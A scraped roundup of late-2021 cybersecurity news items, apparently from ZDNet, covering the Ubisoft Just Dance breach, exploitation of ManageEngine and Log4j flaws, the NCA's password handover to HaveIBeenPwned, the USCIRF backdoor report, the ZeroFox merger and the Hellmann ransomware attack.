Information Technology

Gaming giant Ubisoft has confirmed a cyberattack on its IT infrastructure targeting the popular game Just Dance. The company explained that the incident “was the result of a misconfiguration, that once identified, was quickly fixed, but made it possible for unauthorized individuals to access and possibly copy some personal player data.” 

Ubisoft did not respond to requests for comment about how many people were affected by the incident.”The data in question was limited to ‘technical identifiers’ which include GamerTags, profile IDs, and Device IDs as well as Just Dance videos that were recorded and uploaded to be shared publicly with the in-game community and/or on your social media profiles,” the Just Dance team explained in a note on Ubisoft’s message board.  “Our investigation has not shown that any Ubisoft account information has been compromised as a result of this incident.”Anyone affected by the breach will receive an email from Ubisoft and will be given more information through the company’s support team. The team urged players to enable two-factor authentication and to reset any passwords.Ubisoft added that it took “all the proactive measures necessary” to secure its infrastructure from future cyberattacks. 

Axios reported on Monday that Ubisoft has faced a wave of departures over the last 18 months due to low pay, organizational dysfunction, and a stream of scandals. A developer who left recently told Axios that they were contacted by a co-worker for help in fixing a game because no one left at the company knew what to do.Employees have called it the “great exodus” and explained that the loss of talent was damaging their ability to push out games. Several hundred current and former employees signed an open letter earlier this year, criticizing Ubisoft for not doing enough to address problems within the company. In October 2020, the Egregor ransomware gang said it breached the Ubisoft network and stole data, leaking about 20 MBs on its leak site. Ubisoft never commented on the breach. The company was also attacked in 2013. According to the BBC, the accounts of 58 million people were accessed.Ubisoft has sold millions of copies of Just Dance since it debuted in 2009.  More

The FBI’s cyber division has issued an alert warning enterprises using Zoho-owned ManageEngine’s Desktop Central that advanced attackers have been exploiting a flaw to install malware since late October.

ZDNet Recommends

Best security key 2021

While robust passwords go a long way to securing your valuable online accounts, hardware-based two-factor authentication takes that security to the next level.

Read More

Zoho released a patch for an authentication bypass flaw CVE-2021-44515 on December 3, warning at the time that it had seen “indications of exploitation” and urged customers to update immediately.    Zoho didn’t provide further details of the attacks at the time, which occurred after activity this year targeting previously patched flaws in ManageEngine products that are tracked as CVE-2021-40539 and CVE-2021-44077. However, the FBI says in the new alert that advanced persistent threat (APT) actors have been exploiting CVE-2021-44515 since at least October 2021. “Since at least late October 2021, APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers,” the FBI alert said.Microsoft has previously attributed some of the earlier activity to a Chinese hacker group that was installing web shells on compromised servers to gain persistence on compromised servers. The flaws affected IT management products used by end-user organizations and managed service providers.  The FBI now says it observed APT actors compromising Desktop Central servers using the flaw, now known as CVE-2021-44515 to drop a webshell that overrides a legitimate function of Desktop Central. The attackers then downloaded post-exploitation tools, enumerated domain users and groups, conducted network reconnaissance, attempted lateral movement across the network and dumped credentials.

ManageEngine is the enterprise IT management software division of Zoho, a company well known for its software-as-a-service products.The flaw affects Desktop Central software for both enterprise customers and the version for managed service provider (MSP) customers.The FBI has filled in some details about how attackers are abusing the flaw after obtaining samples that were downloaded from likely compromised ManageEngine ADSelfService Plus servers.It has seen attackers upload two variants of web shells with the filenames emsaler.zip (variant 1, late October 2021), eco-inflect.jar (variant 1, mid November 2021) and aaa.zip (variant 2, late November 2021). The webshell overrides the legitimate Desktop Central application protocol interface servlet endpoint. The webshell is also used for reconnaissance and domain enumeration. Eventually, the attackers install a remote access tool (RAT) for further intrusion, lateral movement, and credential dumping using the penetration testing tool Mimikatz, and LSASS process memory dumping. The attackers also used the Windows authentication protocol WDigest to steal credentials through an LSASS dump, signaling the attackers were using so-called ‘living off the land’ legitimate tools for nefarious purposes. Others tools in this category include Microsoft’s BITSAdmin command-line tool “to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe”, according to the FBI.   ManageEngine has strongly advised customers to update their installations to the latest build as soon as possible. More

The UK National Cyber Security Centre (NCSC) is urging company boards to start asking key questions about how prepared they are to mitigate and remediate the widespread, critical Log4Shell flaw in Java-based application error logging component Log4j.NCSC calls Log4Shell “potentially the most severe computer vulnerability in years” and called upon company boards to treat this bug with urgency. It stresses the Log4j bug – also known as Log4Shell – is a software component rather than a piece of software, which means it will be much more complicated to patch. Log4Shell is bad news today and will likely lurk in enterprise systems for years despite major efforts from the US government, big tech and open-source contributors to address flaws in the original Log4J version 2 project, its implementation in major software products, and its deployment in hundreds of millions of enterprise applications, servers and internet-facing devices. LOG4J FLAW COVERAGE – WHAT YOU NEED TO KNOW NOW There are ongoing efforts via the Apache Foundation to patch the core Log4j project, as well as downstream efforts by IBM, Cisco, Oracle, VMware and others to patch products containing vulnerable versions of the Log4j component. Google has also released tools to prevent developers using vulnerable Log4j versions in new builds of open-source software. And the US government has ordered all federal agencies to patch or mitigate Log4Shell by Christmas.   The urgency is justified. State-sponsored hackers have started scoping out the bug for potential future attacks, according to Microsoft and Google, while cyber criminals are figuring out how to profit from it. Meanwhile, the Belgian Ministry of Defense confirmed an attack on its network using the Log4j bug.   Key challenges NCSC outlines include organizations finding out what services use Log4j; identifying which of these services an organizations uses; and then finding out if these services are vulnerable. CISA has already required all US federal agencies to enumerate any external-facing devices with Log4j installed. That’s no small task, especially given the number of affected products from Cisco, IBM, Oracle and VMware. Because of the component’s widespread use in other products, CISA estimates hundreds of millions of devices worldwide are exposed.”How concerned should boards be?” NCSC asks. 

Very, unless a business can afford disruptions to its operations from ransomware. While Microsoft has not found instances of the more dangerous human-operated ransomware using the vulnerability, it has seen Iranian threat actors tooling up to use it for ransomware attacks. NCSC has posed 10 questions for boards worried about the flaw:Who is leading on our response?What is our plan?How will we know if we’re being attacked and can we respond?What percentage visibility of our software/servers do we have?How are we addressing shadow IT/appliances?Do we know if key providers are covering themselves?Does anyone in our organisation develop Java code?How will people report issues they find to us?When did we last check our business continuity plans and crisis response?How are we preventing teams from burning out?Boards should also consider Log4Shell’s impact if the business needs to disclose where personal data was affected, as well as any costs linked to incident response and recovery, and damage to reputation. “Managing this risk requires strong leadership, with senior managers working in concert with technical teams to initially understand their organisation’s exposure, and then to take appropriate actions.”NCSC says Log4Shell warrants organizations creating a “tiger team” of core staff, including a leader, to address the threat. Boards should also ask ‘what’s our plan?’, and to understand how Log4j issues will be remedied. Boards should understand this will take weeks or months to remediate, not days.   Boards should know how the company is prepared to respond to a Log4Shell attack if and when it happens, and whether the company can detect if such an attack were to take place. It stresses that boards should understand what visibility its teams have of vulnerable software and servers, including IT assets that are centrally managed and unmanaged.LOG4J FLAW COVERAGE – HOW TO KEEP YOUR COMPANY SAFE The software supply chain is another key consideration. NSCS recommends organizations have an “open and honest conversation” with software-as-a-service suppliers that may also be trying to get a grip on which of their products are affected. Java is a hugely popular programming language in enterprise IT that’s used by an estimated 12 million developers worldwide. “Java developers may have legitimately used Log4j, so it’s important to ensure that any software written is not vulnerable,” NCSC notes. As it’s previously noted, Log4j version 2 ships with Log4j version 2 (Log4j2) popular Apache frameworks including Struts2, Solr, Druid, Flink, and Swift.   Finally, after two years of supporting remote work during the pandemic, a year of professional ransomware attacks and state-sponsored attacks on the software supply chain and of the critical Exchange Server zero-day vulnerabilities, NCSC is warning that some cybersecurity teams could suffer burnout during Log4Shell remediation. This is a board-level concern.”Remediating this issue is likely to take weeks, or months for larger organisations. The combination of an ever evolving situation (and the potential for severe impacts) can lead to burnout in defenders, if they’re not supported by leadership,” NSCS stressed.    More

The UK National Crime Agency (NCA) and National Cyber Crime Unit (NCCU) have discovered a 225 million cache of stolen emails and passwords and handed them to HaveIBeenPwned (HIBP), the free service for tracking credentials stolen and/or leaked through past data breaches. The 225 million new passwords become a part of HIPB’s existing body of 613 million passwords in the Pwned Passwords set, which offers website operators a hash of the passwords to ensure users don’t use them when creating a new account. Individuals can use HIPB’s Pwned Password page to see whether their passwords have been leaked in previous breaches.

ZDNet Recommends

The service helps organizations meet the NIST’s recommendation that users should be prevented from using any password that was previously exposed in a breach. That requirement aims to address the increasing use of “credential stuffing”, where criminals test large lists of leaked and commonly-used username and password combinations against various online accounts. SEE: Hackers are turning to this simple technique to install their malware on PCsThe technique has been used to compromise 50,000 online bank accounts since 2017, the FBI warned last year, and works because many people still use the same password to protect multiple accounts; if any of those accounts protected with the common password was breached, the person’s other accounts become vulnerable to credential stuffing. The technique became a problem a decade ago after billions of credentials were leaked online following major data breaches, giving attackers huge credential data sets to test against accounts of varying importance, ranging from online game accounts to bank accounts and employee accounts. NCA and NCCU came across the cache of stolen credentials at a compromised but unnamed cloud storage facility. 

“During recent NCA operational activity, the NCCU’s Mitigation@Scale team were able to identify a huge amount of potentially compromised credentials (emails and associated passwords) in a compromised cloud storage facility,” the NCA said in a statement to HIPB. “Through analysis, it became clear that these credentials were an accumulation of breached datasets known and unknown. The fact that they had been placed on a UK business’s cloud storage facility by unknown criminal actors meant the credentials now existed in the public domain, and could be accessed by other 3rd parties to commit further fraud or cyber offences.”The NCA told the BBC that last year working with UK police it identified that there had been a compromise of a UK organisation’s cloud storage facility, leading to over 40,000 files being uploaded to their servers by cyber criminals. Among these files was the collection of compromised emails and passwords.NCA handed the compromised passwords to HIBP’s operator, Troy Hunt, who verified NCCU’s findings that the passwords were not in the existing Pwned Passwords data set. New passwords included in the cache he said included: flamingo228Alexei200591177700123Testsaganesq”The NCCU’s Mitigation@Scale team conducted a comparison of the compromised data against the HIBP password repository to identify any previously unseen passwords now in the public domain,” NCA said.Organisations can download the hashed data set in SHA-1 format in a compressed 17.2GB file. It’s the first version to include a regularly updated list of compromised credentials that law enforcement, such as the FBI, discover during investigations.   Hunt stressed the passwords supplied to HIPB by the FBI and NCA are not for his service but for the community, since it can be used by anyone to meet NIST’s recommendations to mitigate credential stuffing. 

“Today’s release brings the total Pwned Passwords count to 847,223,402, a 38% increase over the last version. More significantly, if we take the prevalence counts into consideration that’s 5,579,399,834 occurrences of a compromised password represented in this corpus,” explains Hunt.  More

The United States Commission on International Religious Freedom (USCIRF) has been hit with a cyberattack, according to cybersecurity firm Avast. Avast did not identify the federal agency affected but The Record was able to determine it was the USCIRF.The Cybersecurity and Infrastructure Security Agency (CISA) declined to comment on the attack and said all requests for more information should go to USCIRF. USCIRF did not respond to requests for comment. Created in 1998, USCIRF describes itself as a US federal government commission that monitors the right to freedom of religion or belief abroad.  “USCIRF uses international standards to monitor religious freedom violations globally, and makes policy recommendations to the President, the Secretary of State, and Congress,” the organization said on its website. In Avast’s report, the company said attackers were able to compromise systems on USCIRF’s network in a way that “enabled them to run code as the operating system and capture any network traffic traveling to and from the infected system.” The report notes that there is evidence that the attack was done in multiple stages and may have involved “some form of data gathering and exfiltration of network traffic.”

“Further because this could have given total visibility of the network and complete control of an infected system it is further reasonable speculation that this could be the first step in a multi-stage attack to penetrate this, or other networks more deeply in a classic APT-type operation,” Avast said.  “That said, we have no way to know for sure the size and scope of this attack beyond what we’ve seen. The lack of responsiveness is unprecedented and cause for concern. Other government and non-government agencies focused on international rights should use the IoCs we are providing to check their networks to see if they may be impacted by this attack as well.”Avast said the attack has been going on for months yet USCIRF and CISA refused to engage with them when notified. They allegedly tried multiple channels over the course of months to help resolve the issue but were ignored after initial communications. “The attempts to resolve this issue included repeated direct follow up outreach attempts to the organization. We also used other standard channels for reporting security issues directly to affected organizations and standard channels the United States Government has in place to receive reports like this,” Avast explained.  “In these conversations and outreach we have received no follow up or information on whether the issues we reported have been resolved and no further information was shared with us. Because of the lack of discernible action or response, we are now releasing our findings to the community so they can be aware of this threat and take measures to protect their customers and the community.”An Avast spokesperson told ZDNet that after the report was published, they were contacted by CISA. The company admitted that their analysis was based on two files they observed in the attack and noted that without more information from USCIRF, it was hard to know who the attackers are, what their motive is and the potential impact of the attack. The Avast spokesperson said that with the ability to intercept and possibly exfiltrate all local network traffic from USCIRF, the backdoor “had the potential to give the attackers total visibility of the network including information exchanged with other agencies, or international governmental or non governmental organizations, and complete control of the agencies’ system.” “Fixing the issue therefore is essential, however since the agency didn’t respond to us, we can’t tell whether the issues we reported have been resolved,” the spokesperson said. “Taken altogether, this attack could have given total visibility of the network and complete control of a system and thus could be used as the first step in a multi-stage attack to penetrate this, or other networks more deeply.”It has been about one year since the SolarWinds attack, where hackers for the Russian government spent months inside the systems of multiple US government agencies including the Justice Department, Treasury Department, Department of Homeland Security, State Department and Department of Energy.  More

The Belgian Ministry of Defense has confirmed a cyberattack on its networks that involved the Log4j vulnerability. In a statement, the Defense Ministry said it discovered an attack on its computer network with internet access on Thursday. They did not say if it was a ransomware attack but explained that “quarantine measures” were quickly put in place to “contain the infected elements.”

more coverage

“Priority was given to the operability of the network. Monitoring will continue. Throughout the weekend, our teams were mobilized to contain the problem, continue our operations and alert our partners,” the Defense Ministry said. “This attack follows the exploitation of the Log4j vulnerability, which was made public last week and for which IT specialists around the world are jumping into the breach. The Ministry of Defense will not provide any further information at this stage.”Multiple reports from companies like Google and Microsoft have indicated that government hacking groups around the world are leveraging the Log4j vulnerability in attacks. According to Microsoft, state-sponsored hackers from China, Turkey, Iran and North Korea have started testing, exploiting and using the Log4j bug to deploy a variety of malware, including ransomware. A number of reports have noted that since the vulnerability was discovered nearly two weeks ago, cybercriminal groups have sought to not only use it to gain a foothold in networks but sell that access to others, including governments. Governments around the world have urged agencies and organizations to patch their systems or figure out mitigations in order to avoid attacks and breaches. The US’ Cybersecurity and Infrastructure Security Agency ordered all federal civilian agencies to patch systems before Christmas and Singapore held emergency meetings with critical information infrastructure sectors to prepare them for potential Log4j-related threats.

Centre for Cybersecurity Belgium spokesperson Katrien Eggers told ZDNet that they too sent out a warning to Belgian companies about the Apache Log4j software issue, writing that any organization that had not already taken action should “expect major problems in the coming days and weeks.””Because this software is so widely distributed, it is difficult to estimate how the discovered vulnerability will be exploited and on what scale,” the Centre for Cybersecurity Belgium said, adding that any affected organizations should contact them. “It goes without saying that this is a dangerous situation.” More

SaaS cybersecurity company ZeroFox said on Monday that it has completed a deal to acquire digital privacy protection platform IDX and merge with special purpose acquisition company L&F Acquisition Corp. to create a new entity with an expected equity value of approximately $1.4 billion.The company will be renamed ZeroFox Holdings once the deal goes through and will have the ticker symbol “ZFOX.” The companies expect the deal to close in the first half of 2022. Monarch Alternative Capital LP and several other firms are also investing $170 million in the deal to merge the companies. 

James Foster, chairman and CEO of ZeroFox, said the transaction allows them to create “the industry’s first publicly traded company that is focused on providing an enterprise external cybersecurity SaaS platform.” “We intend to leverage this growth capital to continue investing in our artificial intelligence capabilities, scaling our go-to-market efforts, and expanding our world-class team,” Foster said. The company was founded in 2013 and now has customers in more than 50 countries. Foster told ZDNet that the merger is their best path forward in the current market environment because it provides all the benefits that come from an IPO and being traded on the New York Stock Exchange, without requiring them to go through a traditional IPO process, which he called “restrictive, time-consuming, costly and uncertain.”

“Becoming a publicly traded company is the logical next step to supporting our development and accelerating our growth. This new source of capital will provide greater financial flexibility, in addition to the necessary scale and resources to effectively execute against our go-to-market strategy,” Foster explained, adding that IDX is “the nation’s largest provider of data breach response services.””The combined SaaS business will have over 650 employees and serve approximately 1,700 customers including five of the Fortune Top 10 and the largest companies in media, technology, retail, and energy. Collectively, over 90% of our revenues will be recurring platform subscriptions. The platform will process billions of data elements and protect tens of millions of digital assets around the world.” IDX CEO Tom Kelly said the deal with ZeroFox is the result of a long-standing partnership between the two companies. Adam Gerchen, CEO of LNFA and a new ZeroFox board member, noted that the company is aiming to get a slice of the $51 billion external cybersecurity and digital protection market. 

Tech Earnings More

German logistics giant Hellmann has warned its customers and partners to be on the lookout for fraudulent calls and mail after the company was hit with a ransomware attack two weeks ago. In an update about the cyberattack that initially forced them to remove all connections to their central data center, the company said business operations are back up and running but the “number of so-called fraudulent calls and mails has generally increased.””The forensic investigation has meanwhile confirmed that data was extracted from our servers before our systems were taken offline on December 9. We are currently investigating what type of data was extracted and will proactively provide further information as soon as possible. We are in regular contact with relevant government authorities,” Hellmann said. 

“Whilst communication with Hellmann staff via email and telephone remains safe (inbound and outbound), please make sure that you are actually communicating with a Hellmann employee and beware of fraudulent mails/calls from suspicious sources, in particular regarding payment transfers, change bank account details or the like.”When news of the attack first broke on December 9, the company said the shutdown was having a “material impact” on their business operations.The German company operates in 173 countries, running logistics for a range of air and sea freights as well as rail and road transportation services. Air Cargo News, which first reported the attack, said the company had a revenue of nearly $3 billion last year.BleepingComputer reported last week that ransomware group RansomEXX has claimed responsibility for the attack. After negotiations with Hellmann fell apart, the group published 70.64 GB of stolen documents on their leak site that included business agreements, intra-company emails, and more, the outlet explained. They added that the leaks explained the increase in scam calls. 

In February, the criminal group that deploys the RansomExx ransomware was caught abusing vulnerabilities in the VMWare ESXi product allowing them to take over virtual machines deployed in enterprise environments and encrypt their virtual hard drives.They were also identified by the FBI in November as one of the ransomware groups that use “significant financial events” as leverage during their attacks.”Ransomware groups are using events like mergers and acquisitions to target companies and force them into paying ransoms,” the FBI said. “A November 2020 technical analysis of Pyxie RAT, a remote access trojan that often precedes Defray777/RansomEXX ransomware infections, identified several keyword searches on a victim’s network indicating an interest in the victim’s current and near-future stock share price. These keywords included 10-q, 10-sb, n-csr, nasdaq, marketwired, and newswire.” More